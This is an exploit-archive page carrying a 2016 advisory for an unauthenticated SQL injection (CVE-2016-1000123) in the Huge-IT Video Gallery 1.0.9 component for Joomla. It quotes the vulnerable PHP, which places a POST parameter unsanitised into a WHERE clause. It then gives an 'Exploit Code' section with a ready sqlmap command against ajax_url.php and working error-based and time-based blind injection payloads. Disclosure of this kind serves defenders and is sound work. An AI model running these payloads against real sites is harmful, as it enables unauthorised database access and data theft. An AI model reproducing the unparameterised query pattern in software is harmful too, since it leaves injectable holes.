Skip to content
cyberexploits
webappphptext

Joomla! Component 'com_videogallerylite' 1.0.9 - SQL Injection

Joomla! Component 'com_videogallerylite' 1.0.9 - SQL Injection

Published on 2016-09-22

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/php/webapps/40413.txt7eac4c3a
raw
Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla

Author: Larry W. Cashdollar, @_larry0

Date: 2016-09-15

Download Site: http://huge-it.com/joomla-video-gallery/

Vendor: www.huge-it.com, fixed v1.1.0

Vendor Notified: 2016-09-17

Vendor Contact: info@huge-it.com

Description: A video slideshow gallery.

Vulnerability:

The following code does not prevent an unauthenticated user from injecting SQL into functions located in ajax_url.php. 



Vulnerable Code in : ajax_url.php



 11 define('_JEXEC',1);

 12 defined('_JEXEC') or die('Restircted access');

.

.

.

 28         if($_POST['task']=="load_videos_content"){

 29 

 30             $page = 1;

 31 

 32 

 33             if(!empty($_POST["page"]) && is_numeric($_POST['page']) && $_POST['page']>0){

 34                 $paramssld='';

 35                 $db5 = JFactory::getDBO();

 36                 $query5 = $db->getQuery(true);

 37                 $query5->select('*');

 38                 $query5->from('#__huge_it_videogallery_params');

 39                 $db->setQuery($query5);

 40                 $options_params = $db5->loadObjectList();

 41                 foreach ($options_params as $rowpar) {

 42                     $key = $rowpar->name;

 43                     $value = $rowpar->value;

 44                     $paramssld[$key] = $value;

 45                 }

 46                 $page = $_POST["page"];

 47                 $num=$_POST['perpage'];

 48                 $start = $page * $num - $num;

 49                 $idofgallery=$_POST['galleryid'];

 50 

 51                 $query = $db->getQuery(true);

 52                 $query->select('*');

 53                 $query->from('#__huge_it_videogallery_videos');

 54                 $query->where('videogallery_id ='.$idofgallery);

 55                 $query ->order('#__huge_it_videogallery_videos.ordering asc');

 56                 $db->setQuery($query,$start,$num);



CVE-2016-1000123

Exploit Code:

  aC/ $ sqlmap -u 'http://server/components/com_videogallerylite/ajax_url.php' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2"  --level=5 --risk=3

  aC/ .

  aC/ .

  aC/ .

  aC/ (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 

  aC/ sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:

  aC/ ---

  aC/ Parameter: #1* ((custom) POST)

  aC/     Type: error-based

  aC/     Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)

  aC/     Payload: page=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2

  aC/  

  aC/     Type: AND/OR time-based blind

  aC/     Title: MySQL >= 5.0.12 time-based blind - Parameter replace

  aC/     Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2

  aC/ ---

  aC/ [19:36:55] [INFO] the back-end DBMS is MySQL

  aC/ web server operating system: Linux Debian 8.0 (jessie)

  aC/ web application technology: Apache 2.4.10

  aC/ back-end DBMS: MySQL >= 5.0.12

  aC/ [19:36:55] [WARNING] HTTP error codes detected during run:

  aC/ 500 (Internal Server Error) - 2714 times

  aC/ [19:36:55] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'

  aC/  

  aC/ [*] shutting down at 19:36:55

Advisory: http://www.vapidlabs.com/advisory.php?v=169
View on GitHub